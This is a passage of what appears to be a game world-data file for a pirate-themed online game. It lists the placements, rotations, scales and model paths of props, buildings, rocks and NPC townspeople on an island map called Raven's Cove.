-3.642, -1.861),'Pos': Point3(227.858, 599.531, 24.733),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686476.69akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(124.326, -1.479, 3.384),'Pos': Point3(219.789, 596.027, 24.46),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 
'models/props/pir_m_prp_mng_pickAxe'}},'1273686478.88akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-132.787, 2.78, -3.0),'Pos': Point3(238.042, 601.53, 24.69),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686480.44akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(66.027, -2.762, 3.737),'Pos': Point3(247.303, 621.098, 23.165),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_pickAxe'}},'1273686539.75akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-59.758, 68.327, -42.545),'Pos': Point3(243.925, 614.423, 23.263),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686561.13akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-172.915, 9.497, 0.126),'Pos': Point3(255.179, 636.619, 21.621),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.800000011920929, 0.800000011920929, 0.800000011920929, 1.0),'Model': 'models/props/pir_m_prp_mng_shovel'}},'1273686833.66akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-25.301, 0.0, -6.454),'Pos': Point3(-277.603, 484.462, 39.752),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273686885.94akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(46.695, -6.141, 1.797),'Pos': Point3(-291.045, 469.908, 40.379),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20_burned'}},'1273686958.42akelts': {'Type': 'Building Exterior','File': '','ExtUid': 
'1273686958.42akelts0','Holiday': '','Hpr': VBase3(138.518, 0.0, 0.0),'Pos': Point3(-297.131, 462.941, 41.13),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273687006.28akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273687006.28akelts0','Holiday': '','Hpr': VBase3(-38.711, -1.48, 0.0),'Pos': Point3(-318.596, 434.153, 43.182),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273687055.81akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-100.155, 4.165, -4.86),'Pos': Point3(-322.832, 427.713, 43.388),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687099.22akelts': {'Type': 'Volcano','DisableCollision': True,'Holiday': '','Hpr': VBase3(-106.286, -0.163, -0.179),'Pos': Point3(-293.979, 464.42, 41.084),'Scale': VBase3(0.411, 0.411, 0.411),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_vol_treeDead_c'}},'1273687160.83akelts': {'Type': 'Volcano','DisableCollision': True,'GridPos': Point3(-426.697, 211.64, 65.499),'Holiday': '','Hpr': VBase3(-11.646, 0.0, -10.532),'Pos': Point3(-210.559, 447.661, 52.937),'Scale': VBase3(1.443, 1.443, 1.443),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_flower_white_c'}},'1273687224.78akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(66.782, -0.836, 5.727),'Pos': Point3(-574.146, 361.781, 52.602),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 
'models/props/pir_m_prp_fnc_wood20_burned'}},'1273687265.03akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(95.732, -2.351, 1.61),'Pos': Point3(-599.555, 290.817, 62.925),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687287.48akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(71.697, -3.341, 4.575),'Pos': Point3(-601.474, 310.446, 61.667),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20_burned'}},'1273687397.27akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(54.183, -3.28, 8.798),'Pos': Point3(-595.101, 329.416, 60.01),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687424.47akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(60.939, -1.983, 9.631),'Pos': Point3(-583.728, 344.773, 55.897),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273687605.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(134.56, 2.875, 1.229),'Pos': Point3(-258.023, -283.022, 114.403),'RenderEffect': False,'Scale': VBase3(4.469, 4.469, 5.16),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273687762.78akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(32.613, 0.0, 0.0),'Pos': Point3(-498.712, 21.793, 75.79),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.45, 0.4, 0.4, 1.0),'Model': 'models/props/pir_m_prp_cem_headstones_b'}},'1273701053.88akelts': {'Type': 
'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-14.924, 0.0, 4.703),'Pos': Point3(-24.692, -43.474, 95.407),'RenderEffect': False,'Scale': VBase3(1.754, 1.754, 1.754),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273702563.27akelts': {'Type': 'Fountain','DisableCollision': True,'Holiday': '','Hpr': VBase3(-28.92, 0.459, 0.0),'Pos': Point3(-476.172, 57.564, 74.607),'Scale': VBase3(0.553, 0.553, 0.553),'VisSize': '','Visual': {'Color': (0.4, 0.45, 0.4, 1.0),'Model': 'models/props/spanishtown_fountain'}},'1273702749.44akelts': {'Type': 'Shanty Tents','Hpr': VBase3(156.204, 0.0, 0.0),'Pos': Point3(-334.917, 189.754, 66.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_group3_burned'}},'1273702780.16akelts': {'Type': 'Shanty Tents','Hpr': VBase3(28.713, 0.0, 0.0),'Pos': Point3(-319.735, 87.811, 64.379),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_group3_burned'}},'1273702826.28akelts': {'Type': 'Shanty Tents','Hpr': VBase3(-110.134, 0.0, 0.0),'Pos': Point3(-402.083, 203.322, 66.709),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_tnt_single_burned'}},'1273702880.47akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273702880.47akelts0','Holiday': '','Hpr': VBase3(-112.635, -3.781, -3.745),'Pos': Point3(-225.914, -259.289, 112.427),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273702950.36akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(0.181, 0.0, -3.835),'Pos': Point3(-300.56, 171.07, 64.25),'RenderEffect': False,'Scale': VBase3(3.183, 3.183, 3.183),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 
1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273703038.08akelts': {'Type': 'Well','DisableCollision': False,'Holiday': '','Hpr': VBase3(70.933, 0.0, 0.0),'Pos': Point3(-436.71, 127.503, 68.513),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/wellA'}},'1273858743.94akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(176.269, 0.0, 0.0),'Pos': Point3(-403.426, 104.394, 67.949),'RenderEffect': False,'Scale': VBase3(1.723, 1.723, 1.723),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273858797.39akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273858797.39akelts0','Holiday': '','Hpr': VBase3(-47.748, -8.792, -1.392),'Pos': Point3(-562.966, 383.311, 49.796),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273858851.44akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(66.136, 53.323, 51.859),'Pos': Point3(-552.776, 388.505, 38.734),'RenderEffect': False,'Scale': VBase3(1.297, 1.297, 1.297),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273858987.22akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(31.095, -0.746, 0.693),'Pos': Point3(-212.821, 774.071, -3.55),'RenderEffect': False,'Scale': VBase3(7.541, 7.541, 7.541),'VisSize': '','Visual': {'Color': (0.7, 1.0, 0.964, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273859048.28akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(73.304, 9.28, 5.988),'Pos': Point3(-800.584, 95.651, -1.557),'RenderEffect': False,'Scale': VBase3(1.229, 1.229, 1.229),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 
'models/props/pir_m_prp_cav_rock_c'}},'1273859133.81akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(32.595, -3.915, 0.217),'Pos': Point3(-520.421, 408.404, 44.525),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859164.74akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(15.872, -3.812, -0.918),'Pos': Point3(-503.415, 419.347, 44.34),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859174.89akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(35.219, -3.901, 4.806),'Pos': Point3(-484.317, 424.862, 44.597),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1273859206.33akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(62.237, -1.287, 11.837),'Pos': Point3(-467.986, 436.288, 43.03),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_wood20'}},'1274118830.34akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(62.237, -1.287, 11.837),'Pos': Point3(-458.958, 453.09, 38.932),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_woodPost'}},'1274118881.0akelts': {'Type': 'Wall','DisableCollision': False,'Hpr': VBase3(-100.155, 4.165, -4.86),'Pos': Point3(-326.48, 408.027, 45.226),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/props/pir_m_prp_fnc_woodPost'}},'1274122002.33akelts': {'Type': 
'Dinghy','Aggro Radius': '20.0000','Hpr': VBase3(123.755, 0.0, 0.0),'Location': 'Water','Pos': Point3(-797.07, 19.959, -0.393),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/shipparts/dingy-geometry_High'}},'1274122131.17akelts': {'Type': 'Mining_props','DisableCollision': False,'GridPos': Point3(213.256, 596.251, 24.747),'Holiday': '','Hpr': VBase3(8.662, -0.074, -0.031),'Pos': Point3(1.191, 637.046, 13.473),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/pir_m_prp_mng_cartEmpty'}},'1274136366.05akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.538, 0.0, 0.0),'Pos': Point3(261.866, 599.52, 213.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_mng_elevator_basket'}},'1274136840.84akelts': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': VBase3(24.33, 0.0, 0.0),'Pos': Point3(255.091, 623.539, 23.168),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/crate'}},'1274136872.56akelts': {'Type': 'Crate','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-411.1, 115.72, 67.91),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/props/crate'}},'1274137485.25akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(112.039, 0.0, 0.0),'Pos': Point3(241.098, 607.806, 24.142),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/props/pir_m_prp_mng_elevator_basket'}},'1274137802.23akelts': {'Type': 'Mining_props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-155.538, 0.0, 0.0),'Pos': Point3(261.866, 599.52, 213.495),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 
'models/props/pir_m_prp_mng_elevator_top'}},'1274195453.61akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-58.904, 7.94, -8.183),'Pos': Point3(-342.922, -330.634, 121.628),'RenderEffect': False,'Scale': VBase3(2.721, 2.721, 3.141),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1274195538.28akelts': {'Type': 'Crane','DisableCollision': False,'Holiday': '','Hpr': VBase3(131.644, 0.0, 0.0),'Pos': Point3(282.147, 459.249, 202.504),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/props/Crane'}},'1274196102.14akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(110.199, -7.323, -58.919),'Pos': Point3(67.602, 395.779, 18.968),'RenderEffect': False,'Scale': VBase3(2.348, 2.348, 2.348),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1274196159.81akelts': {'Type': 'Pier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-96.644, -0.964, -6.807),'Pos': Point3(349.82, -51.986, 5.56),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/islands/pier_walkway'}},'1274196236.31akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-88.954, 0.0, 0.0),'Pos': Point3(407.739, 269.496, -4.196),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1274196276.94akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(169.54, -26.818, -8.856),'Pos': Point3(275.639, 437.807, 106.873),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1274311689.13akelts': {'Type': 'Door Locator Node','Name': 
'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.044, -4.421, 5.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1274311689.16akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(8.421, -1.87, 0.156),'Scale': VBase3(1.0, 1.0, 1.0)},'1274819841.73gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(32.042, -2.686, -4.673),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(4.269, 659.765, 21.452),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274825376.01gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-8.055, -0.531, 0.64),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-5.432, 657.406, 21.487),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274825967.94gcarranza': {'Type': 
'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(21.117, -1.468, -2.281),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(0.892, 659.11, 21.417),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274889994.04gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-6.774, -0.369, -2.025),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-5.287, 657.7, 21.293),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274890958.87gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(26.696, 0.017, -1.906),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol 
Radius': '12.0000','Pos': Point3(3.173, 659.291, 21.404),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274892762.3gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(6.267, 2.685, -1.604),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-2.134, 658.838, 21.388),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274894542.99gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(14.639, 1.972, 0.235),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-2.075, 658.292, 21.352),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start 
State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274906957.35gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(22.873, 1.313, -1.695),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(0.958, 659.437, 21.576),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274908180.63gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(9.927, 0.8, -0.026),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-1.216, 658.929, 21.478),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274909359.61gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 
'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-0.677, 0.761, -1.416),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-3.292, 658.423, 21.43),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0}},'Undockable': False,'Visibility': 'Grid','Visual': {'Model': 'models/islands/pir_m_are_isl_ravensCove'}}},'Layers': {},'ObjectIds': {'1271348547.01akelts': '["Objects"]["1271348547.01akelts"]','1271350320.82akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271350320.82akelts"]','1271353150.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353150.08akelts"]','1271353336.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]','1271353336.94akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]','1271353336.96akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]["Objects"]["1271353336.96akelts"]','1271353423.55akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]','1271353423.55akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]','1271353423.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]["Objects"]["1271353423.62akelts"]','1271353470.51akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353470.51akelts"]','1271353470.51akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353470.51akelts"]','1271353470.54akelts': 
